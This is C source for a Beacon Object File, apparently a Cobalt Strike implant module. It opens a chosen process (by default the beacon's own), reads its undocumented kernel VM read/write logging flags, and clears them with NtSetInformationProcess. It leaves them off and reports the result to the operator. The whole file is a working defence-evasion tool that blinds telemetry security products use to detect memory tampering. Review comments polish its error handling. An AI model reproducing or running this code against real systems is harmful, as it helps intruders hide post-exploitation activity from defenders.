#include <windows.h>
#include <processthreadsapi.h>
#include "beacon.h"
#include "bofdefs.h"
/* Direct ntdll imports, resolved by the BOF loader through the MODULE$Function
 * naming convention. Prototypes follow the NtQueryInformationProcess /
 * NtSetInformationProcess signatures (handle, info class, buffer, length
 * [, returned length]); both return an NTSTATUS that the caller must check. */
DECLSPEC_IMPORT NTSTATUS WINAPI NTDLL$NtQueryInformationProcess(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
DECLSPEC_IMPORT NTSTATUS WINAPI NTDLL$NtSetInformationProcess(HANDLE, PROCESSINFOCLASS, PVOID, ULONG);
/* PROCESSINFOCLASS values that are not in winternl.h, hence defined here.
 * NOTE(review): 0x57 (87) and 0x60 (96) are undocumented info classes; they
 * appear to match the phnt numbering for ProcessEnableReadWriteVmLogging and
 * ProcessEnableLogging, but Microsoft does not guarantee them, and the kernel
 * may reject them (e.g. STATUS_INVALID_INFO_CLASS) on builds that predate
 * them — confirm against the Windows versions this is meant to run on. */
#define ProcessEnableReadWriteVmLogging ((PROCESSINFOCLASS)0x57)
#define ProcessEnableLogging ((PROCESSINFOCLASS)0x60)
/* One-byte view of a process's VM read/write logging switches, as passed to
 * NtQuery/NtSetInformationProcess(ProcessEnableReadWriteVmLogging).
 * The union lets the same byte be read either whole (Flags) or bit by bit;
 * bit 0 = read-VM logging, bit 1 = write-VM logging, upper 6 bits unused.
 * NOTE(review): bit order assumes the LSB-first bitfield layout MSVC/GCC use
 * on x86/x64; the meaning of the bits is taken from their names and is not
 * documented by Microsoft. */
typedef union _PROCESS_READWRITEVM_LOGGING_INFORMATION {
UINT8 Flags;
struct {
UINT8 EnableReadVmLogging : 1;
UINT8 EnableWriteVmLogging : 1;
UINT8 Unused : 6;
};
} PROCESS_READWRITEVM_LOGGING_INFORMATION, * PPROCESS_READWRITEVM_LOGGING_INFORMATION;
/* Wider (32-bit) logging-switch view used with the ProcessEnableLogging info
 * class. Bits 0-1 mirror the read/write-VM switches of the one-byte struct
 * above; bits 2-5 add process/thread suspend-resume and local/remote
 * exec-protect-VM logging; the remaining 26 bits are reserved.
 * This file only ever queries this class — it is never written here.
 * NOTE(review): field meanings are inferred from the names; the layout is
 * undocumented and should be checked against phnt for the target build. */
typedef union _PROCESS_LOGGING_INFORMATION
{
ULONG Flags;
struct
{
ULONG EnableReadVmLogging : 1;
ULONG EnableWriteVmLogging : 1;
ULONG EnableProcessSuspendResumeLogging : 1;
ULONG EnableThreadSuspendResumeLogging : 1;
ULONG EnableLocalExecProtectVmLogging : 1;
ULONG EnableRemoteExecProtectVmLogging : 1;
ULONG Reserved : 26;
};
} PROCESS_LOGGING_INFORMATION, *PPROCESS_LOGGING_INFORMATION;
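/*
 * psloginfo: print, clear, then re-print a process's VM read/write logging
 * switches.
 *
 * pid  Target process id (go() substitutes the beacon's own pid for 0).
 *
 * Sequence (unchanged from the original):
 *   1. Open with PROCESS_QUERY_INFORMATION (0x0400) and dump both the
 *      ProcessEnableReadWriteVmLogging (0x57) and ProcessEnableLogging (0x60)
 *      views.
 *   2. Re-open with PROCESS_SET_INFORMATION (0x0200) and clear
 *      EnableReadVmLogging / EnableWriteVmLogging through
 *      NtSetInformationProcess(ProcessEnableReadWriteVmLogging).
 *   3. Re-open for query and dump both views again, so the operator sees the
 *      state the kernel actually reports rather than what was requested.
 *
 * The original flag values are neither saved nor restored; the target is
 * left with logging cleared. Every handle is opened with only the access it
 * needs and closed before the next open.
 *
 * Fixes over the original: each NTSTATUS is now checked and reported. Both
 * info classes are undocumented and can fail (unsupported build, access or
 * privilege denied); previously a failed query still printed the
 * uninitialised output structs, i.e. garbage stack bits presented as flag
 * values. The structs are also zero-initialised so a skipped print can
 * never show stale data. NT_SUCCESS() is not provided by every header set
 * used for BOFs, so the equivalent `status < 0` test is used directly.
 */
VOID psloginfo(DWORD pid) {
    HANDLE pHandle = KERNEL32$OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
    if (pHandle == NULL) {
        BeaconPrintf(0, "psloginfo: openprocess 0x0400 err: %d\n", KERNEL32$GetLastError());
        return;
    }

    /* Zero-initialised: a failed query must not leave stack garbage behind. */
    PROCESS_LOGGING_INFORMATION plog = {0};
    PROCESS_READWRITEVM_LOGGING_INFORMATION prwlog = {0};
    ULONG outb = 0;
    NTSTATUS status;

    /* --- 1. initial state ------------------------------------------------ */
    status = NTDLL$NtQueryInformationProcess(pHandle, ProcessEnableReadWriteVmLogging, &prwlog, sizeof(prwlog), &outb);
    if (status < 0) {
        BeaconPrintf(0, "psloginfo: query ProcessEnableReadWriteVmLogging failed, status 0x%08lx\n", (unsigned long)status);
    } else {
        BeaconPrintf(0, "psloginfo: prwlog: readvm %d, writevm %d\n", prwlog.EnableReadVmLogging, prwlog.EnableWriteVmLogging);
    }

    status = NTDLL$NtQueryInformationProcess(pHandle, ProcessEnableLogging, &plog, sizeof(plog), &outb);
    if (status < 0) {
        BeaconPrintf(0, "psloginfo: query ProcessEnableLogging failed, status 0x%08lx\n", (unsigned long)status);
    } else {
        BeaconPrintf(0, "psloginfo: plog: readvm %d, writevm %d\n\tpsuspend %d, tsuspend %d\n\tlxprotect %d, rxprotect %d\n",
            plog.EnableReadVmLogging,
            plog.EnableWriteVmLogging,
            plog.EnableProcessSuspendResumeLogging,
            plog.EnableThreadSuspendResumeLogging,
            plog.EnableLocalExecProtectVmLogging,
            plog.EnableRemoteExecProtectVmLogging);
    }
    KERNEL32$CloseHandle(pHandle);

    /* --- 2. clear read/write VM logging ---------------------------------- */
    pHandle = KERNEL32$OpenProcess(PROCESS_SET_INFORMATION, FALSE, pid);
    if (pHandle == NULL) {
        BeaconPrintf(0, "psloginfo: openprocess 0x0200 err: %d\n", KERNEL32$GetLastError());
        return;
    }
    /* Only the two VM bits are cleared; whatever was in Unused is kept from
     * the query above (all zero if that query failed). */
    prwlog.EnableReadVmLogging = 0;
    prwlog.EnableWriteVmLogging = 0;
    status = NTDLL$NtSetInformationProcess(pHandle, ProcessEnableReadWriteVmLogging, &prwlog, sizeof(prwlog));
    if (status < 0) {
        /* Reported but not fatal: the re-query below still shows the real state. */
        BeaconPrintf(0, "psloginfo: set ProcessEnableReadWriteVmLogging failed, status 0x%08lx\n", (unsigned long)status);
    }
    KERNEL32$CloseHandle(pHandle);

    /* --- 3. confirm what the kernel now reports -------------------------- */
    pHandle = KERNEL32$OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
    if (pHandle == NULL) {
        BeaconPrintf(0, "psloginfo (after adjusting): openprocess 0x0400 err: %d\n", KERNEL32$GetLastError());
        return;
    }

    status = NTDLL$NtQueryInformationProcess(pHandle, ProcessEnableReadWriteVmLogging, &prwlog, sizeof(prwlog), &outb);
    if (status < 0) {
        BeaconPrintf(0, "psloginfo (after adjusting): query ProcessEnableReadWriteVmLogging failed, status 0x%08lx\n", (unsigned long)status);
    } else {
        BeaconPrintf(0, "psloginfo (after adjusting): prwlog: readvm %d, writevm %d\n", prwlog.EnableReadVmLogging, prwlog.EnableWriteVmLogging);
    }

    status = NTDLL$NtQueryInformationProcess(pHandle, ProcessEnableLogging, &plog, sizeof(plog), &outb);
    if (status < 0) {
        BeaconPrintf(0, "psloginfo (after adjusting): query ProcessEnableLogging failed, status 0x%08lx\n", (unsigned long)status);
    } else {
        BeaconPrintf(0, "psloginfo (after adjusting): plog: readvm %d, writevm %d\n\tpsuspend %d, tsuspend %d\n\tlxprotect %d, rxprotect %d\n",
            plog.EnableReadVmLogging,
            plog.EnableWriteVmLogging,
            plog.EnableProcessSuspendResumeLogging,
            plog.EnableThreadSuspendResumeLogging,
            plog.EnableLocalExecProtectVmLogging,
            plog.EnableRemoteExecProtectVmLogging);
    }
    KERNEL32$CloseHandle(pHandle);
}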
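/*
 * go: BOF entry point invoked by Beacon.
 *
 * Buffer/Length  Argument blob packed by the aggressor script. The only
 *                field read is a single int: the target pid.
 *
 * A pid of 0 selects the beacon's own process (GetCurrentProcessId).
 * NOTE(review): this relies on BeaconDataInt returning 0 when no argument
 * was packed — confirm against the beacon.c this is linked with; it is not
 * visible here. A negative int would wrap to a large DWORD and simply fail
 * in OpenProcess inside psloginfo.
 *
 * Fix over the original: the stray `;` after the closing brace (an empty
 * file-scope declaration, rejected under -pedantic) is removed.
 */
VOID go(
    IN PCHAR Buffer,
    IN ULONG Length
)
{
    datap parser = {0};
    BeaconDataParse(&parser, Buffer, Length);

    DWORD pid = (DWORD)BeaconDataInt(&parser);
    if (pid == 0) {
        pid = KERNEL32$GetCurrentProcessId();
    }

    psloginfo(pid);
}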